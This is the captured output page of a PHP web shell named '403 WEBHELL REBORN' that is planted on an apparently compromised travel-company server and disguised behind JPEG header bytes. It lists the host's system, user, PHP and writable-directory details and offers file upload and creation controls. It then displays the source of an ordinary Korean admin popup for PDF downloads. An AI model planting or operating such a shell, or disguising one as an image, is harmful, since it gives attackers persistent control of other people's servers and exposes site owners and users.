ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache
System : Linux ruga7-004.fmcity.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : tkt_travelbus ( 1137)
PHP Version : 7.0.0p1
Disable Function : mysql_pconnect
Directory :  /tkt_travelbus/www/admin/m_good/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /tkt_travelbus/www/admin/m_good/ajax_pdf_download.html
<? 
include "../include/top_proc.html";

// 행사구분
$data_date_type = good_date_type($g_uid,"","N","Y");
?>

<div id="popup_zone">
	<span class="btn_close"><a nohref="#"><img src="../../tmbi_images/common/close_popup_gray.png" alt="닫기" /></a></span>
	<h3><strong style="font-size:22px; font-weight:900; color: #ff6000;"><?=_e("PDF 다운로드")?></strong></h3>
	<div id="popup_cont" style="padding:15px;">

	<div id="popup_scroll_box">
		<? foreach($data_date_type as $k => $v){ ?>
		<? if($k == 0){ ?>
		<!--<span style="font-weight:bold;"><?=$v['date_type_nm']?></span>-->
		<div class="pdf_choice">
			<div class="choice_l">
				<?=_e("TK 로고가 있는 홍보");?>
				<p>
					<?if($v['pdf_url']){?>
					<a href="<?=$v['pdf_url']?>" target="_blank"><img src="/admin/m_image/common/icon_pdf_down.png"></a>
					<? } else { ?>
					<img src="/admin/m_image/common/icon_pdf_none.png">
					<? } ?>
				</p>
			</div>
			<div class="slash"></div>
			<div class="choice_r">
				<?=_e("TK 로고가 없는 홍보");?>
				<p>
					<? if($v['pdf_url2']) { ?>
					<a href="<?=$v['pdf_url2']?>" target="_blank"><img src="/admin/m_image/common/icon_pdf_down.png"></a>
					<? } else { ?>
					<img src="/admin/m_image/common/icon_pdf_none.png">
					<? } ?>
				</p>
			</div>
		</div>
		<? } ?>
		<? } ?>
	</div>
</div>
<style>

</style>

<script type="text/javascript">
$(document).ready(function() {
	$(".btn_close").on("click",function(){
		window_close();
	});
});

function window_close(){
	$("#m_popup").html('').hide();
	$("#mask").hide();
	$('body').removeClass('body_lock');
}
</script>

Anon7 - 2021